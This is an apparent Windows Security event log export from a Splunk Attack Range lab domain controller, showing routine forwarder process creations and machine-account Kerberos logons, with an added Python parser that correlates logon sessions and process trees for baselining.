Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13a0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:20:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263685
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xa60
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:20:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263689
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x746E55
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:20:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263688
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x746E55
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59967
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:20:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263687
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x746E55
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
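The three records above for Logon ID 0x746E55 (the 4634 logoff, the 4624 logon and the 4672 special-privilege assignment) only describe one session once they are joined on the Logon ID, as the 4634 description says, and the 4688 records only become a process tree once joined on Creator Process ID. The following Python is an added example written for this page, not code from Splunk, Attack Range or the original export: it parses this multi-line export format (a timestamp line opens each record, Key=Value header lines follow, then "Name: value" body lines grouped under section headers such as "New Logon:", then Microsoft's explanatory sentences) and performs both joins. The SAMPLE string is constructed from abbreviated copies of the records above; the field-matching regular expressions are the example's own heuristics for this layout, not a Splunk or Windows specification.

```python
import re
from collections import defaultdict

# Constructed sample: four records excerpted and abbreviated from the export above (Logon ID 0x746E55 plus the 4688 for splunk-powershell.exe). The 4634 precedes its 4624, as on the page.
SAMPLE = r"""
04/19/2021 02:20:13 PM
EventCode=4688
ComputerName=win-dc-209.attackrange.local
Message=A new process has been created.
Process Information:
New Process ID: 0x15a8
Creator Process ID: 0xb20
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 02:20:55 PM
EventCode=4634
ComputerName=win-dc-209.attackrange.local
Message=An account was logged off.
Subject:
Account Name: WIN-DC-209$
Logon ID: 0x746E55
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:20:55 PM
EventCode=4624
ComputerName=win-dc-209.attackrange.local
Message=An account was successfully logged on.
Subject:
Logon ID: 0x0
Logon Information:
Logon Type: 3
New Logon:
Account Name: WIN-DC-209$
Logon ID: 0x746E55
Network Information:
Source Network Address: ::1
04/19/2021 02:20:55 PM
EventCode=4672
ComputerName=win-dc-209.attackrange.local
Message=Special privileges assigned to new logon.
Subject:
Account Name: WIN-DC-209$
Logon ID: 0x746E55
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeDebugPrivilege
"""

TS_RE = re.compile(r"^\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2} [AP]M$")   # a timestamp line opens a record
HEADER_RE = re.compile(r"^([A-Za-z]+)=(.*)$")                        # Splunk header, e.g. EventCode=4688
FIELD_RE = re.compile(r"^([A-Z][A-Za-z0-9 ()]{0,40}):(?: (.*))?$")  # "Logon ID: 0x3E7" or bare "Subject:"
PRIV_RE = re.compile(r"^Se[A-Za-z]+Privilege$")                     # continuation lines of a 4672

def parse_events(text):
    """One dict per record. Body fields are keyed 'Section/Name' so 'Subject/Logon ID' and 'New Logon/Logon ID'
    do not collide; the explanatory sentences Windows appends to each message have no 'Name: value' shape and are skipped."""
    events, cur, section, last_key = [], None, "", ""
    for raw in text.splitlines():
        line = raw.strip()
        if TS_RE.match(line):
            cur, section, last_key = {"_time": line}, "", ""
            events.append(cur)
            continue
        if cur is None or not line:
            continue
        f, h = FIELD_RE.match(line), HEADER_RE.match(line)
        if f and f.group(2) is None:                     # "Creator Subject:" starts a section
            section = f.group(1)
        elif f:
            last_key = f"{section}/{f.group(1)}" if section else f.group(1)
            cur[last_key] = [f.group(2)] if f.group(1) == "Privileges" else f.group(2)
        elif h:                                          # Splunk header line
            cur[h.group(1)] = h.group(2)
        elif PRIV_RE.match(line) and last_key.endswith("Privileges"):
            cur[last_key].append(line)                   # further privileges of a 4672
    return events

def correlate_sessions(events):
    """Stitch 4624 (logon), 4672 (privileges) and 4634 (logoff) together by Logon ID. The ID is
    unique only per host per boot, so the key includes ComputerName; record order is irrelevant."""
    sessions = defaultdict(dict)
    for ev in events:
        host, code = ev.get("ComputerName", ""), ev.get("EventCode")
        if code == "4624":
            sessions[(host, ev["New Logon/Logon ID"])].update(
                account=ev.get("New Logon/Account Name"), logon_time=ev["_time"],
                logon_type=ev.get("Logon Information/Logon Type"),
                source=ev.get("Network Information/Source Network Address"))
        elif code == "4672":
            sessions[(host, ev["Subject/Logon ID"])]["privileges"] = ev.get("Subject/Privileges", [])
        elif code == "4634":
            sessions[(host, ev["Subject/Logon ID"])]["logoff_time"] = ev["_time"]
    return dict(sessions)

def process_tree(events):
    """Group 4688s by (host, Creator Process ID) -> [(New Process ID, command line)]."""
    children = defaultdict(list)
    for ev in events:
        if ev.get("EventCode") == "4688":
            key = (ev.get("ComputerName", ""), ev["Process Information/Creator Process ID"])
            children[key].append((ev["Process Information/New Process ID"],
                                  ev["Process Information/Process Command Line"]))
    return dict(children)
```

Run against the full export, correlate_sessions yields one entry per machine-account session on win-dc-209 (WIN-DC-209$ arriving from ::1 and fe80::..., WIN-HOST-797$ from 10.0.1.15), each carrying the identical 4672 privilege list; that list, and the logon type 3 Kerberos source, is what a baseline for this host looks like, and the analytic value is in any session that departs from it. process_tree shows splunkd.exe (PID 0xb20, under the SYSTEM logon 0x3E7) spawning the forwarder's own helper binaries, which is the Universal Forwarder's normal modular-input behaviour and not a finding on its own.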
04/19/2021 02:21:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263691
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1610
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:21:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263690
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd1c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:21:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263692
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1590
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:21:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263693
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x53c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:21:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263694
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1994
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:21:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263696
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x188c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:21:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263695
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x137c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:21:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263698
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x749DA9
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59973
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:21:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263697
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x749DA9
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:21:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263703
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x74A34B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:21:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263702
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x74A3CC
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {59BF5E39-EF3C-C4F1-62B6-4D331A885FBB}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 53023
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:21:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263701
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x74A34B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 53022
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:21:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263700
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x74A31D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 53021
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:21:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263699
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x74A304
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 53020
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:21:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263706
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
